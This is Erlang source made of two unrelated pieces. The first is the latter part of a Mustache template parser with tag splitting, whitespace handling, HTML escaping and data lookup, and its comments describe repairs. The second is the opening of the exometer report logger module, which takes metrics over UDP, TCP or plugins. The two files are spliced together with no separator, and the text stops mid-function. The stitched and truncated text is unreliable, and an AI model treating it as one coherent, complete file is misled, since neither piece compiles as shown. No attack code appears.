            error({?PARSE_ERROR, {section_is_incorrect, binary_join(Keys, <<".">>)}});
        {#state{partials = Partials} = State, Tags} ->
            %% Tags were accumulated in reverse. Delimiters are reset to the
            %% defaults so a `{{=..=}}' change cannot leak into the next parse;
            %% usort also deduplicates the collected partial keys.
            {State#state{partials = lists:usort(Partials), start = ?START_TAG, stop = ?STOP_TAG},
             lists:reverse(Tags)}
    end.
%% @doc Part of the `parse/1'
%%
%% ATTENTION: The result is a list that is inverted.
-spec parse1(state(), Input :: binary(), Result :: [tag()]) -> {state(), [tag()]} | endtag().
%% Scans for the next start delimiter or newline, whichever comes first.
%% A newline (re)arms `standalone', which later lets tag handlers strip the
%% surrounding whitespace of tags that sit alone on a line.
parse1(#state{start = Start} = State, Bin, Result) ->
    case binary:match(Bin, [Start, <<"\n">>]) of
        nomatch -> {State, ?ADD(Bin, Result)};
        {S, L} ->
            Pos = S + L,
            B2 = binary:part(Bin, Pos, byte_size(Bin) - Pos),
            case binary:at(Bin, S) of
                %% Matched the newline: stash the text up to (and including)
                %% it, then continue in standalone mode.
                $\n -> parse1(State#state{standalone = true}, B2, ?ADD(binary:part(Bin, 0, Pos), Result)); % \n
                %% Matched the start delimiter: split out the tag and dispatch.
                _ -> parse2(State, split_tag(State, Bin), Result)
            end
    end.
%% @doc Part of the `parse/1'
%%
%% ATTENTION: The result is a list that is inverted.
-spec parse2(state(), iolist(), Result :: [tag()]) -> {state(), [tag()]} | endtag().
%% Dispatch on the sigil that follows the start delimiter:
%%   `&' or `{' -> unescaped variable    `#' / `^' -> (inverted) section
%%   `=...='    -> delimiter change      `!'       -> comment
%%   `/'        -> section end           `>'       -> partial
%%   (none)     -> escaped variable
%% B1 is the literal text before the tag, B2 the tag body, B3 the rest.
parse2(State, [B1, B2, B3], Result) ->
    case remove_space_from_head(B2) of
        <<T, Tag/binary>> when T =:= $&; T =:= ${ ->
            parse1(State#state{standalone = false}, B3, [{'&', keys(Tag)} | ?ADD(B1, Result)]);
        <<T, Tag/binary>> when T =:= $#; T =:= $^ ->
            parse_loop(State, ?IIF(T =:= $#, '#', '^'), keys(Tag), B3, [B1 | Result]);
        <<"=", Tag0/binary>> ->
            %% Delimiter change must be wrapped as `=... =', i.e. it must also
            %% end with `='; otherwise the tag is rejected.
            Tag1 = remove_space_from_tail(Tag0),
            Size = byte_size(Tag1) - 1,
            case Size >= 0 andalso Tag1 of
                <<Tag2:Size/binary, "=">> -> parse_delimiter(State, Tag2, B3, [B1 | Result]);
                _ -> error({?PARSE_ERROR, {unsupported_tag, <<"=", Tag0/binary>>}})
            end;
        <<"!", _/binary>> ->
            %% Comment tag: emits nothing; only standalone-line cleanup runs.
            parse3(State, B3, [B1 | Result]);
        <<"/", Tag/binary>> ->
            %% Section end: hand control back to the enclosing parse_loop/5,
            %% reporting the full end-tag width for Source extraction.
            EndTagSize = byte_size(B2) + byte_size(State#state.start) + byte_size(State#state.stop),
            {endtag, {State, keys(Tag), EndTagSize, B3, [B1 | Result]}};
        <<">", Tag/binary>> ->
            parse_jump(State, filename_key(Tag), B3, [B1 | Result]);
        Tag ->
            parse1(State#state{standalone = false}, B3, [{n, keys(Tag)} | ?ADD(B1, Result)])
    end;
%% split_tag/2 produced fewer than three parts: no stop delimiter was found.
parse2(_, _, _) ->
    error({?PARSE_ERROR, unclosed_tag}).
%% @doc Part of the `parse/1'
%%
%% End-of-tag processing for tags that must honour standalone-line handling.
-spec parse3(#state{}, binary(), [tag()]) -> {state(), [tag()]} | endtag().
%% The newest accumulated element may be a tag tuple; it must stay in place
%% while standalone/3 inspects only the literal text around the current tag.
parse3(State0, Post0, [Tag | Result0]) when is_tuple(Tag) ->
    {State1, _, Post1, Result1} = standalone(State0, Post0, Result0),
    parse1(State1, Post1, [Tag | Result1]);
parse3(State0, Post0, Result0) ->
    {State1, _, Post1, Result1} = standalone(State0, Post0, Result0),
    parse1(State1, Post1, Result1).
%% @doc Loop processing part of the `parse/1'
%%
%% `{{# Tag}}' or `{{^ Tag}}' corresponds to this.
-spec parse_loop(state(), '#' | '^', [key()], Input :: binary(), Result :: [tag()]) -> {state(), [tag()]} | endtag().
parse_loop(State0, Mark, Keys, Input0, Result0) ->
    %% Strip the standalone opening-tag line, then parse the section body into
    %% its own (reversed) tag list until the matching end tag surfaces.
    {State1, _, Input1, Result1} = standalone(State0, Input0, Result0),
    case parse1(State1, Input1, []) of
        %% `Keys' is already bound: this clause only matches the end tag that
        %% closes THIS section.
        {endtag, {State2, Keys, LastTagSize, Rest0, LoopResult0}} ->
            {State3, _, Rest1, LoopResult1} = standalone(State2, Rest0, LoopResult0),
            case Mark of
                %% `#' sections also record the raw body source so it can be
                %% handed to lambda values at render time (see compile_impl).
                '#' -> Source = binary:part(Input1, 0, byte_size(Input1) - byte_size(Rest1) - LastTagSize),
                       parse1(State3, Rest1, [{'#', Keys, lists:reverse(LoopResult1), Source} | Result1]);
                '^' -> parse1(State3, Rest1, [{'^', Keys, lists:reverse(LoopResult1)} | Result1])
            end;
        %% An end tag surfaced, but for a different section name.
        {endtag, {_, OtherKeys, _, _, _}} ->
            error({?PARSE_ERROR, {section_is_incorrect, binary_join(OtherKeys, <<".">>)}});
        %% Input ran out before any end tag appeared.
        _ ->
            error({?PARSE_ERROR, {section_end_tag_not_found, <<"/", (binary_join(Keys, <<".">>))/binary>>}})
    end.
%% @doc Partial tag part of the `parse/1'
-spec parse_jump(state(), Tag :: binary(), NextBin :: binary(), Result :: [tag()]) -> {state(), [tag()]} | endtag().
%% Handle a partial tag `{{> Tag}}': strip the standalone line around it,
%% remember the key so the partial file can be parsed later (see
%% parse_remaining_partials/3), and emit a {'>', Key, Indent} tag. The
%% stripped leading indentation is kept so the partial can be re-indented.
parse_jump(State0, Tag, NextBin0, Result0) ->
    {State1, Indent, Rest, Acc} = standalone(State0, NextBin0, Result0),
    #state{partials = Partials} = State1,
    State2 = State1#state{partials = [Tag | Partials]},
    parse1(State2, Rest, [{'>', Tag, Indent} | Acc]).
%% @doc Update delimiter part of the `parse/1'
%%
%% ParseDelimiterBin :: e.g. `{{=%% %%=}}' -> `%% %%'
-spec parse_delimiter(state(), ParseDelimiterBin :: binary(), NextBin :: binary(), Result :: [tag()]) -> {state(), [tag()]} | endtag().
%% Apply a delimiter change tag. `DelimiterSpec' is the inner part of
%% `{{=Start Stop=}}' (e.g. `%% %%'); it must contain exactly two
%% whitespace-separated, `='-free delimiters.
parse_delimiter(State0, DelimiterSpec, NextBin, Result) ->
    %% Reject any `=' inside the spec first -- it would be ambiguous.
    binary:match(DelimiterSpec, <<"=">>) =:= nomatch
        orelse error({?PARSE_ERROR, delimiters_may_not_contain_equals}),
    Parts = [P || P <- binary:split(DelimiterSpec, <<" ">>, [global]), P =/= <<>>],
    case Parts of
        [Start, Stop] ->
            parse3(State0#state{start = Start, stop = Stop}, NextBin, Result);
        _ ->
            error({?PARSE_ERROR, delimiters_may_not_contain_whitespaces})
    end.
%% @doc Split by the tag, it returns a list of the split binary.
%%
%% e.g.
%% ```
%% 1> split_tag(State, <<"...{{hoge}}...">>).
%% [<<"...">>, <<"hoge">>, <<"...">>]
%%
%% 2> split_tag(State, <<"...{{hoge ...">>).
%% [<<"...">>, <<"hoge ...">>]
%%
%% 3> split_tag(State, <<"...">>)
%% [<<"...">>]
%% '''
-spec split_tag(state(), binary()) -> [binary(), ...].
%% The while-loop counts immediately repeated start delimiters (so `{{{' is
%% detected when the start delimiter itself is `{'-only); the E/S corrections
%% then shift the split points so the extra braces of a triple mustache stay
%% attached to the tag, producing a `{'-prefixed tag for parse2/3.
split_tag(#state{start = StartDelimiter, stop = StopDelimiter}, Bin) ->
    case binary:match(Bin, StartDelimiter) of
        nomatch ->
            %% No tag at all: everything is literal text.
            [Bin];
        {StartPos, StartDelimiterLen} ->
            PosLimit = byte_size(Bin) - StartDelimiterLen,
            %% Number of additional, immediately repeated start delimiters
            %% following the first one.
            ShiftNum = while({true, StartPos + 1},
                             fun(Pos) ->
                                     ?IIF(Pos =< PosLimit
                                          andalso binary:part(Bin, Pos, StartDelimiterLen) =:= StartDelimiter,
                                          {true, Pos + 1}, {false, Pos})
                             end) - StartPos - 1,
            {PreTag, X} = split_binary(Bin, StartPos + ShiftNum),
            Tag0 = part(X, StartDelimiterLen, 0),
            case binary:split(Tag0, StopDelimiter) of
                [_] -> [PreTag, Tag0]; % not found.
                [Tag, Rest] ->
                    IncludeStartDelimiterTag = binary:part(X, 0, byte_size(Tag) + StartDelimiterLen),
                    %% E: correction at the stop side (+1 consumes a trailing
                    %% `}' from Rest, -1 gives one back to the tag).
                    E = ?IIF(repeatedly_binary(StopDelimiter, $}),
                             ?IIF(byte_size(Rest) > 0 andalso binary:first(Rest) =:= $}, 1, 0),
                             ?IIF(byte_size(Tag) > 0 andalso binary:last(Tag) =:= $}, -1, 0)),
                    %% S: correction at the start side, analogous to E.
                    S = ?IIF(repeatedly_binary(StartDelimiter, ${),
                             ?IIF(ShiftNum > 0, -1, 0),
                             ?IIF(byte_size(Tag) > 0 andalso binary:first(Tag) =:= ${, 1, 0)),
                    case E =:= 0 orelse S =:= 0 of
                        true -> % {{ ... }}
                            [PreTag, Tag, Rest];
                        false -> % {{{ ... }}}
                            [part(PreTag, 0, min(0, S)),
                             part(IncludeStartDelimiterTag, max(0, S) + StartDelimiterLen - 1, min(0, E)),
                             part(Rest, max(0, E), 0)]
                    end
            end
    end.
%% @doc if it is standalone line, remove spaces from edge.
-spec standalone(#state{}, binary(), [tag()]) -> {#state{}, StashPre :: binary(), Post :: binary(), [tag()]}.
%% Only effective right after a newline (standalone =:= true): when the text
%% before the tag is pure indentation and the text after it starts with a
%% line break (or is the end of input), both are removed so the tag's line
%% vanishes from the output. The stripped indentation is returned as StashPre
%% (parse_jump/4 uses it as the partial's indent). Otherwise, standalone mode
%% is switched off and everything is kept.
standalone(#state{standalone = false} = State, Post, [Pre | Result]) ->
    {State, <<>>, Post, ?ADD(Pre, Result)};
standalone(#state{standalone = false} = State, Post, Result) ->
    {State, <<>>, Post, Result};
standalone(State, Post0, Result0) ->
    %% Peel off the literal text preceding the tag, if any.
    {Pre, Result1} = case Result0 =/= [] andalso hd(Result0) of
                         Pre0 when is_binary(Pre0) -> {Pre0, tl(Result0)};
                         _ -> {<<>>, Result0}
                     end,
    case remove_indent_from_head(Pre) =:= <<>> andalso remove_indent_from_head(Post0) of
        <<"\r\n", Post1/binary>> ->
            {State, Pre, Post1, Result1};
        <<"\n", Post1/binary>> ->
            {State, Pre, Post1, Result1};
        <<>> ->
            {State, Pre, <<>>, Result1};
        _ ->
            %% Not a standalone line after all: keep Pre in the result.
            {State#state{standalone = false}, <<>>, Post0, ?ADD(Pre, Result1)}
    end.
%% @doc If the binary is repeatedly the character, return true. Otherwise, return false.
-spec repeatedly_binary(binary(), byte()) -> boolean().
%% True when every byte of the binary equals Char (vacuously true for <<>>).
repeatedly_binary(Bin, Char) ->
    case Bin of
        <<>> ->
            true;
        <<Char, Rest/binary>> ->
            repeatedly_binary(Rest, Char);
        _ ->
            false
    end.
%% @doc During the first element of the tuple is true, to perform the function repeatedly.
-spec while({boolean(), term()}, fun((term()) -> {boolean(), term()})) -> term().
%% Keep applying Fun to the carried value as long as the first tuple element
%% is true; return the value carried by the first {false, _}.
while({Continue, Value}, Fun) ->
    case Continue of
        true -> while(Fun(Value), Fun);
        false -> Value
    end.
%% @equiv binary:part(X, Start, byte_size(X) - Start + End)
-spec part(binary(), non_neg_integer(), 0 | neg_integer()) -> binary().
%% Slice from Start to (byte_size + End), i.e. End trims |End| bytes off the
%% tail. Equivalent to binary:part(X, Start, byte_size(X) - Start + End).
part(X, Start, End) when End =< 0 ->
    Len = byte_size(X) - Start + End,
    binary:part(X, Start, Len).
%% @doc binary to keys
-spec keys(binary()) -> [key()].
%% Turn a tag body into a dotted key path. All spaces are insignificant
%% inside a tag and are removed first; an empty tag and the self-reference
%% tag `.' are returned as a single-element path.
keys(Bin0) ->
    Stripped = binary:replace(Bin0, <<" ">>, <<>>, [global]),
    if
        Stripped =:= <<>>; Stripped =:= <<".">> ->
            [Stripped];
        true ->
            [K || K <- binary:split(Stripped, <<".">>, [global]), K =/= <<>>]
    end.
%% @doc binary to filename key
-spec filename_key(binary()) -> key().
%% Partial names keep interior spaces; only surrounding spaces are trimmed.
filename_key(Bin) ->
    Trimmed = remove_space_from_head(Bin),
    remove_space_from_tail(Trimmed).
%% @doc Function for binary like the `string:join/2'.
-spec binary_join(BinaryList :: [binary()], Separator :: binary()) -> binary().
%% Join binaries with Sep, like string:join/2 but producing a binary.
binary_join([], _Sep) ->
    <<>>;
binary_join([First | Rest], Sep) ->
    iolist_to_binary([First | [[Sep, B] || B <- Rest]]).
%% @doc Remove the space from the head.
-spec remove_space_from_head(binary()) -> binary().
%% Strip leading 16#20 bytes (plain spaces only; tabs are kept).
remove_space_from_head(Bin) ->
    case Bin of
        <<" ", Rest/binary>> -> remove_space_from_head(Rest);
        _ -> Bin
    end.
%% @doc Remove the indent from the head.
-spec remove_indent_from_head(binary()) -> binary().
%% Strip leading indentation: both tabs and spaces.
remove_indent_from_head(<<$\t, Rest/binary>>) ->
    remove_indent_from_head(Rest);
remove_indent_from_head(<<$\s, Rest/binary>>) ->
    remove_indent_from_head(Rest);
remove_indent_from_head(Bin) ->
    Bin.
%% @doc Remove the space from the tail.
-spec remove_space_from_tail(binary()) -> binary().
%% Strip trailing 16#20 bytes by walking the space matches backwards from
%% the end of the binary (see remove_space_from_tail_impl/2).
remove_space_from_tail(<<>>) ->
    <<>>;
remove_space_from_tail(Bin) ->
    SpacePositions = lists:reverse(binary:matches(Bin, <<" ">>)),
    End = remove_space_from_tail_impl(SpacePositions, byte_size(Bin)),
    binary:part(Bin, 0, End).
%% @see remove_space_from_tail/1
-spec remove_space_from_tail_impl([{non_neg_integer(), pos_integer()}], non_neg_integer()) -> non_neg_integer().
%% Walk reversed {Pos, Len} space matches; while a match ends exactly at the
%% current size, move the cut point to its start. Returns the final size.
remove_space_from_tail_impl([{Pos, Len} | Rest], Size) when Pos + Len =:= Size ->
    remove_space_from_tail_impl(Rest, Pos);
remove_space_from_tail_impl(_, Size) ->
    Size.
%% @doc string or binary to binary
-spec to_binary(binary() | [byte()]) -> binary().
%% Normalize a byte list to a binary; binaries pass through untouched.
to_binary(Bytes) when is_list(Bytes) ->
    list_to_binary(Bytes);
to_binary(Bin) when is_binary(Bin) ->
    Bin.
%% @doc HTML Escape
-spec escape(binary()) -> binary().
%% Escape a binary byte-by-byte via escape_char/1 and rebuild the result.
escape(Bin) ->
    iolist_to_binary([escape_char(C) || <<C:8>> <= Bin]).
%% @doc escape a character if needed.
-spec escape_char(byte()) -> <<_:8, _:_*8>>.
%% Map the HTML-significant characters to their entity; everything else is
%% passed through as a single byte.
%% FIX: the entity strings had been HTML-unescaped back into the raw
%% characters (making the function an identity map, and leaving the `"'
%% clause with the unparsable literal `<<""">>'); restore &lt;/&gt;/&amp;/&quot;.
escape_char($<) -> <<"&lt;">>;
escape_char($>) -> <<"&gt;">>;
escape_char($&) -> <<"&amp;">>;
escape_char($") -> <<"&quot;">>;
escape_char(C)  -> <<C:8>>.
%% @doc convert to {@link data_key/0} from binary.
-spec convert_keytype(key(), template()) -> data_key().
%% Convert a binary key into the representation selected by the `key_type'
%% option (string | atom | binary; default string). For `atom', only
%% already-existing atoms are accepted -- an unknown atom yields the <<" ">>
%% sentinel, which can never occur as a real key in data/0.
convert_keytype(KeyBin, #?MODULE{options = Options}) ->
    KeyType = proplists:get_value(key_type, Options, string),
    case KeyType of
        binary ->
            KeyBin;
        string ->
            binary_to_list(KeyBin);
        atom ->
            try
                binary_to_existing_atom(KeyBin, utf8)
            catch
                _:_ -> <<" ">> % It is not always present in data/0
            end
    end.
%% @doc fetch the value of the specified `Keys' from {@link data/0}
%%
%% - If `Keys' is `[<<".">>]', it returns `Data'.
%% - If raise_on_context_miss enabled, it raise an exception when missing `Keys'. Otherwise, it returns `Default'.
-spec get_data_recursive([key()], data(), Default :: term(), template()) -> term().
get_data_recursive(Keys, Data, Default, Template) ->
    case get_data_recursive_impl(Keys, Data, Template) of
        {ok, Term} -> Term;
        error ->
            %% Miss: either raise (raise_on_context_miss option) or fall back
            %% to the caller-supplied Default.
            case ?RAISE_ON_CONTEXT_MISS_ENABLED(Template#?MODULE.options) of
                true -> error(?CONTEXT_MISSING_ERROR({key, binary_join(Keys, <<".">>)}));
                false -> Default
            end
    end.
%% @see get_data_recursive/4
-spec get_data_recursive_impl([key()], data(), template()) -> {ok, term()} | error.
%% Resolution of the first key tries, in order: (1) numeric index into a
%% plain list, (2) keyed lookup in the current map/assoc list, (3) retry in
%% the next outer context popped from the stack. Once a keyed lookup hits,
%% the remaining keys are resolved strictly inside the found value (the
%% context stack is cleared).
get_data_recursive_impl([], Data, _) ->
    {ok, Data};
get_data_recursive_impl([<<".">>], Data, _) ->
    %% `{{.}}' refers to the current context itself.
    {ok, Data};
get_data_recursive_impl([Key | RestKey] = Keys, Data, #?MODULE{context_stack = Stack} = State) ->
    case is_list(Data) andalso find_index_data_from_lists(Key, Data) of
        %% NOTE(review): an index hit returns immediately without descending
        %% into RestKey -- confirm whether paths like "0.name" are intended
        %% to resolve further.
        {ok, ChildData} -> {ok, ChildData};
        _ ->
            case is_recursive_data(Data) andalso find_data(convert_keytype(Key, State), Data) of
                {ok, ChildData} ->
                    get_data_recursive_impl(RestKey, ChildData, State#?MODULE{context_stack = []});
                _ when Stack =:= [] ->
                    error;
                _ ->
                    %% Fall back to the enclosing section's context.
                    get_data_recursive_impl(Keys, hd(Stack), State#?MODULE{context_stack = tl(Stack)})
            end
    end.
%% @doc find the value of the specified key from {@link recursive_data/0}
-spec find_data(data_key(), recursive_data() | term()) -> {ok, Value :: term()} | error.
-ifdef(namespaced_types).
%% Map context (map-capable OTP): straight maps:find/2.
find_data(Key, Map) when is_map(Map) ->
    maps:find(Key, Map);
find_data(Key, AssocList) when is_list(AssocList) ->
    case data_key_to_integer(Key) of
        {ok, Index} ->
            %% Numeric key: 1-based index into the list.
            %% FIX: lists:nth/2 raises an `error'-class exception on an
            %% out-of-range index, but the previous `catch _ ->' pattern only
            %% matched `throw's, so the intended {ok, <<>>} fallback was
            %% unreachable and the lookup crashed instead.
            try lists:nth(Index, AssocList) of
                Value -> {ok, Value}
            catch
                _:_ -> {ok, <<>>}
            end;
        _ ->
            %% If key is not integer parse as Associated List
            case proplists:lookup(Key, AssocList) of
                none -> error;
                {_, V} -> {ok, V}
            end
    end;
find_data(_, _) ->
    error.
-else.
%% Pre-map OTP: only assoc lists are supported as recursive data.
%% FIX: added the is_list/1 guard so the final catch-all clause is reachable
%% (the unguarded clause previously matched every term, leaving the catch-all
%% dead and crashing on non-list data); non-lists now yield `error', matching
%% the branch above. Same `catch _:_' fix as above.
find_data(Key, AssocList) when is_list(AssocList) ->
    case data_key_to_integer(Key) of
        {ok, Index} ->
            try lists:nth(Index, AssocList) of
                Value -> {ok, Value}
            catch
                _:_ -> {ok, <<>>}
            end;
        _ ->
            case proplists:lookup(Key, AssocList) of
                none -> error;
                {_, V} -> {ok, V}
            end
    end;
find_data(_, _) ->
    error.
-endif.
%% @doc When the value is {@link recursive_data/0}, it returns true. Otherwise it returns false.
-spec is_recursive_data(recursive_data() | term()) -> boolean().
-ifdef(namespaced_types).
%% "Recursive data" is any container find_data/2 can do keyed lookup in:
%% a list whose first element is a tuple (assoc list) or -- when maps are
%% available -- a map.
is_recursive_data([Tuple | _]) when is_tuple(Tuple) -> true;
is_recursive_data(V) when is_map(V) -> true;
is_recursive_data(_) -> false.
-else.
%% Pre-map OTP: only assoc lists qualify.
is_recursive_data([Tuple | _]) when is_tuple(Tuple) -> true;
is_recursive_data(_) -> false.
-endif.
%% @doc When the value can convert integer, it returns the integer. Otherwise it returns error.
-spec safe_binary_to_integer(binary()) -> integer() | error.
%% Convert the binary to an integer, or return the atom `error' if the
%% binary is not a complete integer literal (or not a binary at all).
safe_binary_to_integer(Bin) ->
    try erlang:binary_to_integer(Bin)
    catch
        _:_ -> error
    end.
-spec find_index_data_from_lists(binary(), list()) -> {ok, term()} | error.
%% Treat IndexBin as a 0-based index into List; {ok, Element} on success,
%% `error' when the key is not a non-negative integer or is out of range.
find_index_data_from_lists(IndexBin, List) ->
    case safe_binary_to_integer(IndexBin) of
        Index when is_integer(Index), Index >= 0 ->
            %% 0-based in the template, 1-based for lists:nth/2.
            try lists:nth(Index + 1, List) of
                Elem -> {ok, Elem}
            catch
                _:_ -> error
            end;
        _ ->
            error
    end.
-spec can_access_as_list(data_key(), recursive_data() | term()) -> boolean().
%% A value can be accessed as a list only when it IS a list and the key
%% parses as an integer index.
can_access_as_list(_Key, Value) when not is_list(Value) ->
    false;
can_access_as_list(Key, _Value) ->
    case data_key_to_integer(Key) of
        {ok, _Index} -> true;
        _ -> false
    end.
-spec data_key_to_integer(data_key()) -> {ok, integer()} | error.
%% @doc Convert a data key (binary, string or atom) to {ok, Integer} when it
%% is entirely numeric; return `error' otherwise.
%% (This also removes the dataset-join residue that had been appended after
%% the final clause's terminating `.', which made the file unparsable.)
data_key_to_integer(Key) when is_binary(Key) ->
    %% string:to_integer/1 returns {Int, Rest}; accept only fully-numeric keys.
    case string:to_integer(Key) of
        {Index, <<>>} -> {ok, Index};
        _ -> error
    end;
data_key_to_integer(Key) when is_list(Key) ->
    case string:to_integer(Key) of
        {Index, []} -> {ok, Index};
        _ -> error
    end;
data_key_to_integer(Key) when is_atom(Key) ->
    %% Atoms are matched via their textual form, e.g. '7' -> {ok, 7}.
    data_key_to_integer(atom_to_list(Key));
data_key_to_integer(_) ->
    error.
%% -------------------------------------------------------------------
%%
%% Copyright (c) 2015 Basho Technologies, Inc. All Rights Reserved.
%%
%% This Source Code Form is subject to the terms of the Mozilla Public
%% License, v. 2.0. If a copy of the MPL was not distributed with this
%% file, You can obtain one at http://mozilla.org/MPL/2.0/.
%%
%% -------------------------------------------------------------------
%% @doc Exometer report collector and logger.
%%
%% This module implements a behavior for collecting reporting data and
%% handling it (logging to disk or ets, printing to tty, etc.)
%%
%% The logger has built-in support for receiving input via UDP, TCP or
%% internal Erlang messaging, as well as a plugin API for custom input
%% handling. Correspondingly, it has support for output to TTY or ets, as
%% well as a plugin API for custom output.
%%
%% An example of how the logger can be used can be found in
%% `test/exometer_test_udp_reporter.erl', which implements a UDP-based
%% reporter as well as an input plugin and an output plugin. This reporter
%% is used by `test/exometer_report_SUITE.erl'.
%%
%% Loggers can be combined, e.g. by creating one logger that receives Erlang
%% messages, and other loggers that receive from different sources, prefix
%% their reports and pass them on to the first logger.
%%
%% <h2>Input plugins</h2>
%%
%% An input plugin is initiated by `Module:logger_init_input(State)', where
%% `State' is whatever was given as a `state' option (default: `undefined').
%% The function must create a process and return `{ok, Pid}'. `Pid' is
%% responsible for setting up whatever input channel is desired, and passes
%% on incoming data to the logger via Erlang messages `{plugin, Pid, Data}'.
%%
%% <h2>Output Chaining</h2>
%%
%% Each incoming data item is passed through the list of output operators.
%% Each output operator is able to modify the data (the `tty' and `ets'
%% operators leave the data unchanged). Output plugins receive the data
%% in `Module:logger_handle_data(Data, State)', which must return
%% `{NewData, NewState}'. The state is private to the plugin, while `NewData'
%% will be passed along to the next output operator.
%%
%% <h2>Flow control</h2>
%%
%% The logger will handle flow control automatically for `udp' and `tcp'
%% inputs. If `{active,once}' or `{active, false}', the logger will trigger
%% `{active, once}' each time it has handled an incoming message.
%% If `{active, N}', it will "refill" the port each time it receives an
%% indication that it has become passive.
%%
%% Input plugins create a process in `Module:logger_init_input/1'. This process
%% can mimic the behavior of Erlang ports by sending a `{plugin_passive, Pid}'
%% message to the logger. The logger will reply with a message,
%% `{plugin_active, N}', where `N' is the value given by the `active' option.
%% @end
-module(exometer_report_logger).
-behaviour(gen_server).
-export([new/1]).
-export([start_link/1]).
-export([info/0,
info/1]).
-export([init/1,
handle_call/3,
handle_cast/2,
handle_info/2,
terminate/2,
code_change/3]).
%% Server state: instance id plus the initialized input spec and the list of
%% output operator specs (threaded through handle_data/2 on every datum).
-record(st, {id,
             input,
             output}).
%% exprecs generates '#is_record-'/1, '#info-'/2 etc. for the exported
%% records below; pp/1 relies on them to pretty-print state for info/0,1.
-include_lib("parse_trans/include/exprecs.hrl").
-export_records([tcp, udp, tty, ets, int]).
%% input records
-record(tcp, {socket, port, options = [], active = once}).
-record(udp, {socket, port, options = [], active = true}).
%% output records
-record(tty, {prefix = []}).  % prefix is printed verbatim before each datum
-record(ets, {tab}).          % target table; entries are {os:timestamp(), Data}
%% both input and output
-record(int, {process}).      % peer logger instance (pid or registered name)
-record(plugin, {module, mod_state, process, active = once}).
-type proplist() :: [{atom(), any()}].
-type logger_info() :: {id, any()}
                     | {input, proplist()}
                     | {output, proplist()}.
-type plugin_state() :: any().
%% Input plugin: must spawn and return the pid that will forward data to the
%% logger as {plugin, Pid, Data} messages (see module doc).
-callback logger_init_input(any()) ->
    {ok, pid()}.
%% Output plugin: returns an opaque state threaded through logger_handle_data/2.
-callback logger_init_output(any()) ->
    {ok, plugin_state()}.
%% Output step: may transform the data before it reaches the next operator.
-callback logger_handle_data(binary(), plugin_state()) ->
    {binary(), plugin_state()}.
-spec new([{id, any()} | {input, list()} | {output, list()}]) -> {ok,pid()}.
%% @doc Create a new logger instance.
%%
%% This function creates a logger process with the given input and output
%% parameters.
%%
%% * `{id, ID}' is mainly for documentation and simplifying identification
%% of instances returned by {@link info/0}.
%% * `{input, PropList}' specifies what the logger listens to. Only the first
%% `input' entry is regarded, but the option is mandatory.
%% * `{output, PropList}' specifies what the logger should to with received
%% data. Multiple `output' entries are allowed, and they will be processed
%% in the order given.
%%
%% Valid input options:
%%
%% * `{mode, udp | tcp | internal | plugin}' defines the protocol
%% * `{active, false | true | once | N}' provides flow control. Default: `true'.
%% * (mode-specific options)
%%
%% Valid output options:
%%
%% * `{mode, tty | ets | plugin | internal}' defines output types
%% * (output-specific options)
%%
%% Mode-specific options, `udp':
%%
%% * `{port, integer()}' - UDP port number
%% * `{options, list()}' - Options to pass to {@link gen_udp:open/2}
%%
%% Mode-specific options, `tcp':
%%
%% * `{port, integer()}' - TCP port number
%% * `{options, list()}' - Options to pass to {@link gen_tcp:listen/2}
%%
%% Mode-specific options, `tty':
%%
%% * `{prefix, iolist()}' - Prefix string inserted before the data, which is
%% printed as-is (note that any delimiter would need to be part of the prefix)
%%
%% Mode-specific options, `ets':
%% * `{table, ets:table()}' - Ets table identifier. If not specified, an
%% ordered-set table will be created by the logger process. The incoming
%% data will be inserted as `{os:timestamp(), Data}'.
%%
%% Mode-specific options, `internal':
%% * `{process, PidOrRegname}' specifies another logger instance, which is to
%% receive data from this logger (if used in output), or which is allowed
%% to send to this logger (if used in input). If no process is given for
%% input, any process can send data (on the form
%% `{exometer_report_logger, Pid, Data}') to this logger.
%%
%% Mode-specific options, `plugin':
%%
%% * `{module, Module}' - name of callback module
%% (behaviour: `exometer_report_logger')
%% * `{state, State}' - Passed as initial argument to
%% `Module:logger_init_input/1' or `Module:logger_init_output/1', depending
%% on whether the plugin is specified as input or output.
%% @end
new(Options) ->
    %% Starts a supervised instance; the supervisor passes Options through to
    %% start_link/1 (presumably a simple_one_for_one child spec -- verify in
    %% exometer_report_logger_sup).
    supervisor:start_child(exometer_report_logger_sup, [Options]).
-spec start_link(proplist()) -> {ok, pid()}.
%% @doc Start function for logger instance.
%%
%% This function is the start function eventually called as a result from
%% {@link new/1}, but whereas `new/1' creates a supervised instance, this
%% function simply creates the process. It would normally not be used directly.
%% @end
start_link(Options) ->
    %% Validate/normalize the input and output specs client-side before the
    %% gen_server is started; init/1 then performs the side-effecting setup.
    Id = exometer_util:get_opt(id, Options, undefined),
    Args = {Id, get_input(Options), get_output(Options)},
    gen_server:start_link(?MODULE, Args, []).
-spec info() -> [{pid(), [logger_info()]}].
%% @doc List active logger instances.
%%
%% This function lists the instances started via {@link new/1}, along with their
%% respective settings as nested property lists.
%% @end
info() ->
    %% One {Pid, Info} entry per supervised logger instance.
    Children = supervisor:which_children(exometer_report_logger_sup),
    [{Pid, info(Pid)} || {_Id, Pid, _Type, _Mods} <- Children].
-spec info(pid()) -> [logger_info()].
%% @doc Lists the settings of a given logger instance.
info(P) ->
    %% Synchronous query; the instance answers from handle_call(info, ...).
    gen_server:call(P, info).
%% Client-side check
%% Client-side check: only the first `input' entry is used, and both the
%% entry and its `mode' key are mandatory (get_opt/2 fails when missing).
get_input(Opts) ->
    InputOpts = exometer_util:get_opt(input, Opts),
    Mode = exometer_util:get_opt(mode, InputOpts),
    get_input(Mode, InputOpts).
%% Build the per-mode input record from the option list. For the socket
%% modes, the default active mode is derived from the socket options
%% themselves unless an explicit `active' option overrides it.
get_input(tcp, L) ->
    SockOpts = exometer_util:get_opt(options, L, []),
    #tcp{port = exometer_util:get_opt(port, L),
         options = SockOpts,
         active = exometer_util:get_opt(active, L, get_opt_active(SockOpts))};
get_input(udp, L) ->
    SockOpts = exometer_util:get_opt(options, L, []),
    #udp{port = exometer_util:get_opt(port, L),
         options = SockOpts,
         active = exometer_util:get_opt(active, L, get_opt_active(SockOpts))};
get_input(internal, L) ->
    %% No process given means any process may send to this logger.
    #int{process = exometer_util:get_opt(process, L, undefined)};
get_input(plugin, L) ->
    #plugin{module = exometer_util:get_opt(module, L),
            mod_state = exometer_util:get_opt(state, L, undefined),
            active = exometer_util:get_opt(active, L, true)}.
%% Derive the default active mode from a socket option list: `true' and
%% integer counts are taken as-is; anything else (absent, false, once)
%% defaults to `once'.
get_opt_active(Options) ->
    case lists:keyfind(active, 1, Options) of
        {active, true} -> true;
        {active, N} when is_integer(N) -> N;
